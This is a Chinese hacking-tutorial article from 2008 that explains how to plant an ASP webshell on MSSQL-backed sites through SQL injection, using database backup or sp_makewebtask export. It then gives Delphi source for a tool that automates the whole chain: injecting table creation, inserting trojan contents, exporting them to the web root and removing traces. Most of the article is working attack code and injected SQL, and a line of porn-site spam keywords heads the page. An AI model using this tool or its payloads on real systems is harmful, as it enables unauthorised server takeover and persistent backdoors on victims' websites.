国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

安全中國(guó) www.anqn.com更新時(shí)間:2008-8-3 1:07:16責(zé)任編輯:高遠(yuǎn)熱 點(diǎn)：一．通過(guò)SQL注入得到WEBSHELL的原理:N.E.V.E.R的方法：利用數(shù)據(jù)庫(kù)備份得到WEBSHELL。創(chuàng)建一個(gè)表，在表中建一個(gè)字段用來(lái)保存木馬數(shù)據(jù)。然后利用MSSQL導(dǎo)出庫(kù)文件的辦法把整個(gè)數(shù)據(jù)導(dǎo)出來(lái)，最后再刪除新建的表。分析: N.E.V.E.R利用了MSSQL的備份數(shù)據(jù)庫(kù)功能。把數(shù)據(jù)導(dǎo)出來(lái)，設(shè)想數(shù)據(jù)庫(kù)中有<%%>之類的ASP標(biāo)實(shí)符，導(dǎo)出文件，文件名以.ASP的形式保存。然后文件又保存在WEB的路徑下。那么這個(gè)導(dǎo)出的ASP文件是不是要去解釋<%%> 之內(nèi)的語(yǔ)句呢？如果數(shù)據(jù)庫(kù)中有的表中有<%%>標(biāo)實(shí)符，并且這之中有錯(cuò)誤，那么我們導(dǎo)出來(lái)生成的ASP文件也會(huì)有誤。不過(guò)，這種機(jī)會(huì)也不太大。再來(lái)看看CZY的方法吧。CZY的方法：前面的和N.E.V.E.R的方法基本上差不多。只是后面用到了擴(kuò)展存儲(chǔ)過(guò)程——sp_makewebtask。這個(gè)擴(kuò)展存儲(chǔ)過(guò)程的作用就是：可以把MSSQL數(shù)據(jù)庫(kù)中的某個(gè)表中的記錄導(dǎo)出來(lái)，以文件的方法保存起來(lái)。這種方法就不會(huì)出現(xiàn)什么問(wèn)題原因在于：我們只去讀表中的某個(gè)字段中的值。把字段的信息導(dǎo)出來(lái)生成文件。這個(gè)字段中的值都是我們剛加上的。自己在加入數(shù)據(jù)的時(shí)候，先調(diào)試一下，沒(méi)有問(wèn)題在加入進(jìn)去，導(dǎo)出來(lái)就當(dāng)然沒(méi)有問(wèn)題了。以上兩位的方法，我都手工測(cè)試過(guò)。利用SQL注入漏洞，建表，向表中加數(shù)據(jù)，然后再導(dǎo)出數(shù)據(jù)，再刪除表。都是利用的SQL語(yǔ)句。這里我就不多說(shuō)了，大家可以看本期的文章。二．利用DELPHI去實(shí)現(xiàn)功能的前言原理都分析過(guò)了。我們?cè)趺蠢肈ELPHI來(lái)實(shí)現(xiàn)他們的手工操作呢？其實(shí)方法是非常簡(jiǎn)單的。DELPHI提供了一個(gè)NMHTTP控件。我們利用這個(gè)控件就可以向某個(gè)特定的URL提交參數(shù)。然后實(shí)現(xiàn)我們的自動(dòng)注射功能。我馬上要為大家講解的這個(gè)程序，有一個(gè)特點(diǎn)。也可以說(shuō)成是一個(gè)缺陷吧。程序不去自動(dòng)猜解WEB的絕對(duì)路徑。程序不去判斷當(dāng)前連接SQL數(shù)據(jù)庫(kù)的當(dāng)前賬號(hào)的權(quán)限。我為什么要這么做？因?yàn)榈玫竭@兩者用SQL注入是非常難得到的。所以，我們程序發(fā)送命令就不會(huì)考慮太多。成不成功你執(zhí)行完自己去看看生成沒(méi)有就OK了。三．如何利用DELPHI得到WEBSHELL。程序中用到的值。我們這里來(lái)看看有哪些：URL路徑，遠(yuǎn)程WEB絕對(duì)路徑(通過(guò)其他方法得到,你一定有辦法的) 采用什么方法去得到WEBSHELL(也就是兩位的方法，你選哪一種)。我們同時(shí)要求點(diǎn)擊一個(gè)按紐開始執(zhí)行命令，和點(diǎn)擊一個(gè)按紐來(lái)終止命今。最后就是新建的表的名稱，以及表的字段名稱，再次就是字段的類型。前面的我們?cè)诔绦蛑蟹派陷斎耄x擇之類的控件就行了。后面的我們?cè)O(shè)一個(gè)選項(xiàng)按紐點(diǎn)按紐彈出相應(yīng)設(shè)置。再把這些相應(yīng)的設(shè)置用一個(gè)RECORD來(lái)保存。首先，我們?cè)贒IT控件。名稱分別是：UrlET //URL路徑的輸入框、ShellPathET //遠(yuǎn)程木馬的位置、CustomBdoorET//自定義木馬的位置。再放兩個(gè)RadioButton用來(lái)選擇采用什么方式獲取WEBSHELL。CAPTION分別取名為： BackUP DataBase 和 WEB作業(yè)。然后再放三個(gè)SpeedButtion按紐。名稱分別是：設(shè)置，開始，停止, 最后再放一個(gè)MEMO控件。來(lái)顯示當(dāng)前添加的信息。到此界面上的工作就做完了。界面如圖：現(xiàn)在來(lái)寫程序了。我們首先定義一個(gè)RECORD。如下：TypeSetOption = RecordTableName : String; //用來(lái)保存要?jiǎng)?chuàng)建的表名.FieldName : String; //用來(lái)保存要?jiǎng)?chuàng)建的字段名.FiledType : String; //用來(lái)保存創(chuàng)建的字段名類型.End;FiledType字段類型的值是以下類型的一種：Bigint binary bit char datetime decimal float image int money nchar ntext numeric nvarchar real smalldatetime smallintSmallmoney sql_variant text timestamp tinyint uniqueidentifier varbinary varchar 這些都是MSSQL字段類型值.再定義一個(gè)全局變量：VarISStop : Boolean; //用來(lái)判斷用戶是否按下了停止按紐.好了。在表單創(chuàng)建的過(guò)程中，我們?yōu)镽ECORD記錄輸入默認(rèn)值.代碼如下：procedure TMainForm.FormCreate(Sender: TObject);beginsOption.TableName :=’cyfd’sOption.FieldName :=’gmemo’sOption.FiledType :=’text’end;現(xiàn)在我們添加開始執(zhí)行命令的代碼。先定義BDoorList 為TstringList。主要目的就是把木馬的內(nèi)容加進(jìn)來(lái).創(chuàng)建兩個(gè)變量來(lái)保存urlET.和ShellPathET的值.方便程序簡(jiǎn)化調(diào)用.在程序開始執(zhí)行前,我們得先檢查一下用戶的輸入定義一個(gè)Checkinput函數(shù).如下：Function CheckInput : Boolean;BeginResult := False;if Trim(urlet.Text) = ’’ thenBeginApplication.MessageBox(’請(qǐng)輸入U(xiǎn)RL地址!’,’提示’,mb_ok+mb_iconinformation);Exit;End;if Trim(ShellPathET.Text) = ’’ thenBeginApplication.MessageBox(’請(qǐng)輸入文件保存地址!’,’提示’,mb_ok+mb_iconinformation);Exit;End;IF DefBDoor.Checked thenBeginif Not FileExists(extractfilepath(Application.ExeName)+’默認(rèn)木馬.txt’) thenBeginApplication.MessageBox(’沒(méi)有找到 [默認(rèn)木馬.txt] 文件!’,’提示’,mb_ok+mb_iconinformation);Exit;End;EndElseif Not FileExists(CustomBdoorET.Text) thenBeginApplication.MessageBox(’沒(méi)有找到所選的木馬文件!’,’提示’,mb_ok+mb_iconinformation);Exit;End;Result := True;End;在最開始加入:IF Not CheckInput then Exit; //如果輸入不合法就退出過(guò)程.好了，如果用戶輸入沒(méi)什么錯(cuò)，我們就來(lái)下面的代碼。首先我們把IsStop設(shè)為假。創(chuàng)建BdoorList。BDoorList := TstringList.Create;再加木馬內(nèi)容到BDoorlist.BDoorList.LoadFromFile(CustomBdoorET.text);好了,在這里我還要給大家說(shuō)一下：用NMHTTP提交數(shù)據(jù)的時(shí)候.要把輸入的一些特別符號(hào)轉(zhuǎn)達(dá)成編碼。我們這里要把空格和%符號(hào)替換成相應(yīng)的編碼分別是:%20和%25，不然.程序加不進(jìn)數(shù)據(jù)。代碼如下：BDoorList.Text:=StringReplace(BDoorList.Text,’%’,’%25’,[rfReplaceAll]);BDoorList.Text:=StringReplace(BDoorList.Text,’ ’,’%20’,[rfReplaceAll]);接下來(lái).我們就提交建表的功能了.Memo.Lines.Add(’建表...’);Memo.Lines.Add(’’); NMHttp.Get(Url+’CREATE%20TABLE%20[dbo].[’+sOption.TableName+’]%20([’+sOption.FieldName+’]%20[’+sOption.FiledType+’]);’);這樣我們就創(chuàng)建了一個(gè)表。然后.我們向表中加記錄:代碼如下:Memo.Lines.Add(’加數(shù)據(jù)...’);Memo.Lines.Add(’’);For i:=0 to BDoorList.Count-1 do //這里用一個(gè)循環(huán)把木馬的內(nèi)容加進(jìn)表中去.BeginIF IsStop then //這里如果點(diǎn)了停止按紐程序?qū)⒔K止任務(wù).BeginBDoorList.Free;Exit;End; NMhttp.Get(Url+’Insert%20into%20’+sOption.TableName+’%20(’+sOption.FieldName+’)%20values%20(’’’+BDoorList.Strings+’’’);’);Memo.Lines.Add(’Add Line ’+Inttostr(i+1));End;現(xiàn)在就是導(dǎo)出數(shù)據(jù)生成木馬了.Memo.Lines.Add(’導(dǎo)出數(shù)據(jù)...’);Memo.Lines.Add(’’);IF BKData.Checked then //如果選中采用備份數(shù)據(jù)就執(zhí)行下面的命令.NMhttp.Get(Url+’declare%20@a%20sysname;select%20@a=db_name();backup%20database%20@a%20to%20disk=’’’+ShellPath+’’’’)Else //如果是用WEB作業(yè)的形式. NMhttp.Get(Url+’EXECUTE%20sp_makewebtask%20@outputfile=’’’+ShellPath+’’’,@query=’’’+’select%20’+sOption.FieldName+’%20from%20’+sOption.TableName+’’’’);我們?cè)賱h除剛建的表。NMHttp.Get(Url+’drop%20TABLE%20[dbo].[’+sOption.TableName+’];’);這樣我們的任務(wù)就完成了。下面來(lái)釋放變量.BDoorList.Free;再來(lái)向停止按紐中添加點(diǎn)擊事件：一行代碼就行了：IsStop := True;到這里主表單的內(nèi)容基本上完成了。現(xiàn)在我們來(lái)看設(shè)置表單中怎么來(lái)設(shè)置.其實(shí)非常簡(jiǎn)單.主表單中已經(jīng)定義了一個(gè)RECORD.我們只需要將用戶輸入的新值，再次賦給RECORD就行了。設(shè)置表單中先引用主表單.然后在界面中添加二個(gè)EDIT控件：第一個(gè)名稱為：TableNameET //保用戶輸入的存臨時(shí)表第二個(gè)名稱為：FieldNameET //用來(lái)保存用戶輸入的字段名.再添加一個(gè)Combobox　//用來(lái)保存用戶所選的字段類型值.名稱：FieldTypeComboxOK.界面如下：代碼如下:定義一個(gè)過(guò)程,主表單好調(diào)用這個(gè)設(shè)置。Procedure ShowSet;BeginApplication.CreateForm(TSetForm,SetForm);With SetForm doBeginTableNameET.Text := sOption.TableName;FieldNameET.Text := sOption.FieldName;FieldTypeCombox.ItemIndex := FieldTypeCombox.Items.IndexOf(sOption.FiledType);End;SetForm.ShowModal;SetForm.Free;End;在主表單中設(shè)置的點(diǎn)擊事件中添加上showset過(guò)程就行了。下面就是點(diǎn)擊確定的代碼了。IF CheckInput thenBeginsOption.TableName := Trim(TableNameET.Text); //把用戶的輸入賦給RECORD.sOption.FieldName := Trim(FieldNameET.Text);sOption.FiledType := FieldTypeCombox.Text;Close;End;這里又有一個(gè)CheckInput主要就是檢查用戶輸入的值是不是合法。代碼如下:Function CheckInput : Boolean;BeginResult := False;IF Trim(TableNameET.Text)=’’ thenBeginApplication.MessageBox(’請(qǐng)輸入臨時(shí)表名!’,’提示’,mb_ok+mb_iconinformation);Exit;End;IF Trim(FieldNameET.Text)=’’ thenBeginApplication.MessageBox(’請(qǐng)輸入字段名!’,’提示’,mb_ok+mb_iconinformation);Exit;End;Result := True;End;到這里程序就完了。